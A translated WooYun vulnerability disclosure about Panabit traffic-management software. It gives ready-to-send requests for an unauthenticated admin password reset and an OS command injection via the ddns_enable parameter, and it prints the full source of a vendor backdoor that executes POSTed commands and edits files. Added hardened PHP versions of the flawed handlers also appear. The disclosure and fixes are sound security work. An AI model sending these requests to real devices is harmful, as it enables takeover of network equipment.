WooYun >> Vulnerability information

Vulnerability summary

Bug ID: WooYun-2015-114137

Title: Panabit high-risk vulnerability collection (vendor backdoor, direct reset of the admin password, and OS command execution)

Vendor: 北京派网软件有限公司 (Beijing Panabit Software Co., Ltd.)

Author: f4ckbaidu

Submitted: 2015-05-16 17:50

Published: 2015-08-16 14:36

Type: Remote code execution

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organisation (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org, for questions or help contact help@wooyun.org

Tags: vendor backdoor, OS command execution



Vulnerability details

Disclosure status:

2015-05-16: Details sent to the vendor, awaiting vendor handling
2015-05-18: Vendor confirmed; details visible to the vendor only
2015-05-21: Details opened to third-party security partners (绿盟科技/NSFOCUS, 唐朝安全巡航, 无声信息)
2015-07-12: Details opened to core white hats and domain experts
2015-07-22: Details opened to regular white hats
2015-08-01: Details opened to intern white hats
2015-08-16: Details made public

Summary:

Problems in the new UI. The developers really screwed the pooch.

Detailed description:

Tested version:

[screenshot: 1.png, version under test]

None of these issues require a login to exploit. Details below:



0x01 System configuration without login

Many functions can be used without logging in, including changing the traffic-control configuration. I'll use the password change as the example.

Look at the logic of the password-change handler; it leaves me speechless:

(/usr/ramdisk/www/sys/maintain/system_handle.php)

Code:
    if ($type == "changepass_handle") {
        $oldpass = postval("oldpass");
        $newpass = postval("newpass");
        $loginuser = postval("loginuser");

        exec("cat /etc/.htpasswd2 | grep $loginuser:$oldpass", $out, $ret);
        if ($out[0] == "") {
            outputres("no", "");
            exit;
        }
        <password-change logic>



It never checks whether $oldpass is empty. What a genius of a programmer.

Without knowing the old password, a single POST of "type=changepass_handle&loginuser=admin&newpass=123" changes the admin password.

And the page http://IP/sys/Maintain/system_handle.php is reachable without logging in. Try it if you don't believe me.

[screenshot: 2.png, password change without login]
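As an added example (not Panabit's code) of what this branch should look like: the handler enforces a login, rejects an empty old password, takes the username from the session rather than from POST, and does the comparison in PHP instead of interpolating POST values into a grep command line (which is itself a command-injection point). The postval()/outputres() helpers and a /etc/.htpasswd2 holding "user:hash" lines produced by password_hash() are assumptions, since the page does not show the file format.

```php
<?php
// Added example, not Panabit's code: hardened changepass_handle branch.
// Assumed: the original postval()/outputres() helpers exist, and
// /etc/.htpasswd2 holds "user:hash" lines produced by password_hash().

function require_login(): void {
    session_start();
    if (empty($_SESSION['loginuser'])) {   // the original had no login check at all
        outputres("no", "login required");
        exit;
    }
}

function load_htpasswd(string $path): array {
    $users = [];
    foreach (file($path, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) as $line) {
        [$user, $hash] = explode(':', $line, 2) + [1 => ''];
        $users[$user] = $hash;
    }
    return $users;
}

function save_htpasswd(string $path, array $users): void {
    $out = '';
    foreach ($users as $user => $hash) {
        $out .= "$user:$hash\n";
    }
    file_put_contents($path, $out, LOCK_EX);
}

if ($type == "changepass_handle") {
    require_login();
    $oldpass   = (string) postval("oldpass");
    $newpass   = (string) postval("newpass");
    $loginuser = $_SESSION['loginuser'];   // from the session, never from POST
    // Reject empty input explicitly: the original let an empty $oldpass match.
    if ($oldpass === '' || strlen($newpass) < 8) {
        outputres("no", "invalid password");
        exit;
    }
    $users = load_htpasswd('/etc/.htpasswd2');   // compared in PHP, no shell
    if (!isset($users[$loginuser]) || !password_verify($oldpass, $users[$loginuser])) {
        outputres("no", "");
        exit;
    }
    $users[$loginuser] = password_hash($newpass, PASSWORD_DEFAULT);
    save_htpasswd('/etc/.htpasswd2', $users);
    outputres("yes", "");
}
```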





0x02 OS command injection

Still in /usr/ramdisk/www/sys/maintain/system_handle.php:

Code:
    if ($type == "ddns_config_handle") {
        $ddns_enable = postval("ddns_enable");

        $cmd = $ipe_ddns." -e $ddns_enable";
        exec($cmd, $out, $ret);
        if ($ret != "0") {
            outputres("no", $out[0]);
            exit;
        }

        outputres("yes", "");
    }



Nothing much to say about this one.

POST http://IP/sys/Maintain/system_handle.php

Code:
    type=ddns_config_handle&ddns_enable=0|id>/tmp/fuck.txt



The web root /usr/ramdisk is not writable, so the test writes to /tmp/ instead.

[screenshot: 3.png, command output written to /tmp/]
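An added example (not Panabit's code) of the hardened ddns_config_handle branch: the POSTed value is validated against the only two settings the -e flag takes, and escapeshellarg() is applied anyway as defence in depth, so a value like 0|id can never reach the shell as a pipeline. $ipe_ddns, postval() and outputres() are assumed to be the same as in the original file.

```php
<?php
// Added example, not Panabit's code: hardened ddns_config_handle branch.
// Assumed: $ipe_ddns, postval() and outputres() come from the original
// system_handle.php and the binary's -e flag accepts only 0 or 1.

// Allow-list the value instead of interpolating raw POST data into a shell string.
function validate_ddns_enable($value): ?string {
    $v = (string) $value;
    return in_array($v, ['0', '1'], true) ? $v : null;
}

if ($type == "ddns_config_handle") {
    $ddns_enable = validate_ddns_enable(postval("ddns_enable"));
    if ($ddns_enable === null) {
        outputres("no", "ddns_enable must be 0 or 1");
        exit;
    }
    // Defence in depth: even a validated value is quoted, so an input such as
    // 0|id would become the single literal argument '0|id', not a pipeline.
    $cmd = escapeshellarg($ipe_ddns) . " -e " . escapeshellarg($ddns_enable);
    exec($cmd, $out, $ret);
    if ($ret !== 0) {                 // exec() sets an int exit code; compare as one
        outputres("no", $out[0] ?? "");
        exit;
    }
    outputres("yes", "");
}
```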



Lots of the PHP files use exec(); they will have to be fixed one at a time.

Code:
    panaos#find /usr/ramdisk/www/ -name "*.php" | xargs grep -E "exec" | awk -F ":" '{print $1}' | sort -u
    (output: the list of matching PHP files, omitted here)





0x03 Vendor backdoor

Code:
    panaos#cat /usr/ramdisk/www/sys/cmdhandle.php
    <?php
    $doc = $_SERVER['DOCUMENT_ROOT'];
    $cmd = $_POST["cmd"];
    $type = $_POST['type'];

    if ($type == "get"){
        $ds = explode(' ', $cmd);

        $fp = popen($cmd, "r");
        if (!$fp){
            echo "命令执行失败";
            exit(0);
        }

        if (is_file($ds[1]) && !file_exists($ds[1])){
            echo "file no found\n";
            exit(0);
        }
        $str = "";
        while(! feof($fp)){
            $s = htmlspecialchars(fgets($fp));
            $s = str_replace("\n", "<br/>", $s);
            if ($s == "\n") continue;
            $str .= " ".$s;
        }
        echo iconv("gb2312", "utf-8", $str);
        exit(0);
    }

    if ($type == "viget"){
        $ds = explode(' ', $cmd);

        $fp = popen($cmd, "r");
        if (!$fp){
            echo "命令执行失败";
            exit(0);
        }

        if (is_file($ds[1]) && !file_exists($ds[1])){
            echo "file no found\n";
            exit(0);
        }
        $str = "";
        while(! feof($fp)){
            $s = (fgets($fp));
            if ($s == "\n") continue;
            $str .= $s;
        }
        echo iconv("gb2312", "utf-8", $str);
        exit(0);
    }

    if ($type == "save"){
        $con = urldecode($_POST['con']);

        if (!is_file($cmd)){
            echo "该文件不可编辑";
            exit(0);
        }

        $fp = fopen($cmd, "w");
        if (!$fp){
            echo "打开文件失败";
            exit(0);
        }
        fwrite($fp, $con);
        fclose($fp);
        echo "操作成功";
    }



Nothing much to say about this one either: a command-execution and file-read/write backdoor left in by the vendor itself. Taking command execution as the example:

[screenshot: 4.png, command execution via cmdhandle.php]

Proof of concept:

[screenshots: 2.png, 3.png, 4.png, as above]

Fix recommendation:

u know

Copyright notice: please credit the source f4ckbaidu@乌云 when reposting.


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2015-05-18 14:34

Vendor reply:

CNVD has not directly verified the vulnerability described; no direct handling channel with the software vendor has been established yet; pending claim.

Latest status:

None yet


Comments

  1. 2015-05-14 17:57 | f4ck ( intern white hat | Rank:42 vulns:7 | Some people are amazing: one bug gets farmed into N. )
    0

    This is badass. Quite a lot of companies use Panabit.

  2. 2015-05-14 17:58 | PgHook ( regular white hat | Rank:1020 vulns:123 | Portulaca grandiflora Hook. )
    0

    This one's pretty badass.

  3. 2015-05-20 10:11 | wefgod ( core white hat | Rank:1825 vulns:183 | the spirit is willing but the flesh is weak )
    0

    @f4ck come have a look, are you two family?

  4. 2015-05-20 10:25 | f4ck ( intern white hat | Rank:42 vulns:7 | Some people are amazing: one bug gets farmed into N. )
    0

    @wefgod I'm here to see my big cousin.

  5. 2015-05-21 17:33 | 真旅网集团 (WooYun vendor)
    0

    This should never have been exposed at all; just restrict it to the intranet~

  6. 2015-05-21 20:02 | f4ckbaidu ( regular white hat | Rank:243 vulns:32 | The developers really screwed the pooch )
    0

    @真旅网集团 Lots of small businesses and internet cafés use it; their security awareness, you know how it is.

  7. 2015-07-27 15:21 | f4ckbaidu ( regular white hat | Rank:243 vulns:32 | The developers really screwed the pooch )
    0

    No $ for this one?

  8. 2015-07-31 11:39 | f4ckbaidu ( regular white hat | Rank:243 vulns:32 | The developers really screwed the pooch )
    0

    @疯狗

  9. 2015-09-29 11:10 | 名字xsser ( passerby | Rank:5 vulns:1 | Go with the flow and finish the dream | a bit busy lately, if you have questions you can... )
    0

    Isn't the first one, the password change, just a command injection too??
